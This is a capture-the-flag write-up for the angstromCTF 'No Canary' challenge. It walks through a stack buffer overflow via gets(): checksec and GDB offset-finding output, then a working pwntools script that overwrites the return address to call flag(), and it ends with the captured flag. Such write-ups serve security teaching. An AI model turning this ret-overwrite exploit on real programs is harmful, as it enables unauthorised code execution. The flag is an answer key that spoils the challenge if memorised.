## No Canary  

* **Category:**  Binary
* **Points:** 50 
* **Author(s):** b0uldrr

---

### Challenge
```
Agriculture is the most healthful, most useful and most noble employment of man.

—George Washington

Can you call the flag function in this program (source)? Try it out on the shell server at /problems/2020/no_canary or by connecting with nc shell.actf.co 20700.

Author: kmh

```
### Hints
* What's dangerous about the gets function?

### Downloads
* [no_canary](no_canary)
* [no_canary.c](no_canary.c)

---

### Solution

We're given a vulnerable binary and its source code to explore, but to obtain the flag we'll need to submit our payload on the remote server.

Opening the provided source code, we can see the main function prompts for user input and then exits. There is a flag() function which prints the flag to screen, but because it isn't called by any other functions we have no way of getting to it from the normal flow of the program. Fortunately, we can use the gets() call in the main function to overflow the buffer and overwrite the return address on the stack with the address of the flag() function.
```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void flag() {
	system("/bin/cat flag.txt");
}

int main() {
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);
	gid_t gid = getegid();
	setresgid(gid, gid, gid);

	puts("Ahhhh, what a beautiful morning on the farm!\n");
	puts("       _.-^-._    .--.");
	puts("    .-'   _   '-. |__|");
	puts("   /     |_|     \\|  |");
	puts("  /               \\  |");
	puts(" /|     _____     |\\ |");
	puts("  |    |==|==|    |  |");
	puts("  |    |--|--|    |  |");
	puts("  |    |==|==|    |  |");
	puts("^^^^^^^^^^^^^^^^^^^^^^^^\n");
	puts("Wait, what? It's already noon!");
	puts("Why didn't my canary wake me up?");
	puts("Well, sorry if I kept you waiting.");
	printf("What's your name? ");

	char name[20];
	gets(name);

	printf("Nice to meet you, %s!\n", name);
}
```

To do this, we need to know:
1. The architecture of the program (32-bit? 64-bit? Little-endian? etc.)
1. Whether a stack canary has been employed
1. The address of the flag() function
1. The offset from our gets() call input to the return address on the stack

The binary is a 64-bit LSB ELF:
```
tmp@localhost:~/ctf/angstrom/no_canary$ file no_canary
no_canary: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e4c94e78496350a02c414f42dc15444e35332fcd, for GNU/Linux 3.2.0, not stripped
```
With no stack canary:
```
tmp@localhost:~/ctf/angstrom/no_canary$ checksec no_canary
[*] '/home/tmp/ctf/angstrom/no_canary/no_canary'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

The address of flag() is 0x401186:
```
tmp@localhost:~/ctf/angstrom/no_canary$ objdump -D no_canary | grep "flag"
000000000401186 <flag>:
```

I used a De Bruijn sequence in GDB-PEDA to find the overflow offset. The commands used were:

* Create an De Bruijn sequence 400 bytes long to the file overflow.txt:
```
pattern create 400 overflow.txt
```

* Run the program, using that file as input:
```
r < overflow.txt
```

* Once the program seg-faults, examine the contents of the stack pointer:
```
x $rsp
```

* Find the value in $rsp in our overflow pattern:
```
pattern_offset 0x41304141
```

```
gdb-peda$ pattern create 400 overflow.txt
Writing pattern of 400 chars to filename "overflow.txt"
gdb-peda$ r < overflow.txt 
Starting program: /home/tmp/ctf/angstrom/no_canary/no_canary < overflow.txt
Ahhhh, what a beautiful morning on the farm!

       _.-^-._    .--.
    .-'   _   '-. |__|
   /     |_|     \|  |
  /               \  |
 /|     _____     |\ |
  |    |==|==|    |  |
  |    |--|--|    |  |
  |    |==|==|    |  |
^^^^^^^^^^^^^^^^^^^^^^^^

Wait, what? It's already noon!
Why didn't my canary wake me up?
Well, sorry if I kept you waiting.
What's your name? Nice to meet you, AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y!

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7ffff7fb3580 --> 0x0 
RSI: 0x7fffffffba80 ("Nice to meet you, AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXA"...)
RDI: 0x0 
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffe138 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%"...)
RIP: 0x4012dd (<main+324>:      ret)
R8 : 0x7ffff7fb8500 (0x00007ffff7fb8500)
R9 : 0x1a4 
R10: 0x7fffffffbc22 --> 0xa21 ('!\n')
R11: 0x246 
R12: 0x4010a0 (<_start>:        endbr64)
R13: 0x7fffffffe210 ("A%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
R14: 0x0 
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4012d2 <main+313>: call   0x401060 <printf@plt>
   0x4012d7 <main+318>: mov    eax,0x0
   0x4012dc <main+323>: leave  
=> 0x4012dd <main+324>: ret    
   0x4012de:    xchg   ax,ax
   0x4012e0 <__libc_csu_init>:  endbr64 
   0x4012e4 <__libc_csu_init+4>:        push   r15
   0x4012e6 <__libc_csu_init+6>:        lea    r15,[rip+0x2b13]        # 0x403e00
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe138 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%"...)
0008| 0x7fffffffe140 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA"...)
0016| 0x7fffffffe148 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G"...)
0024| 0x7fffffffe150 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%"...)
0032| 0x7fffffffe158 ("IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A"...)
0040| 0x7fffffffe160 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4"...)
0048| 0x7fffffffe168 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%"...)
0056| 0x7fffffffe170 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA"...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004012dd in main ()
gdb-peda$ x/wx $rsp
0x7fffffffe138: 0x41304141
gdb-peda$ pattern_offset 0x41304141
1093681473 found at offset: 40
```

The offset we need is 40.

With this information, I created a python script to automate the attack:

```
#!/usr/bin/python3

import pwn

local = True

if local:
    conn = pwn.process('./no_canary')
else:
    conn = pwn.remote('shell.actf.co', 20700)
    
conn.recvuntil('name? ')

buf  = b'a'*40              # overflow with junk up to an including the base pointer
buf += pwn.p64(0x401186)    # write the address of flag() over the return instruction address on the stack

conn.sendline(buf)
print(conn.recvall())
```
And the result:

```
tmp@localhost:~/ctf/angstrom/no_canary$ ./soln2.py
[+] Opening connection to shell.actf.co on port 20700: Done
[+] Receiving all data: Done (124B)
[*] Closed connection to shell.actf.co port 20700
b'Nice to meet you, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x86\x11@!\nactf{that_gosh_darn_canary_got_me_pwned!}\nSegmentation fault\n'
```

---

### Flag
```
actf{that_gosh_darn_canary_got_me_pwned!}
```
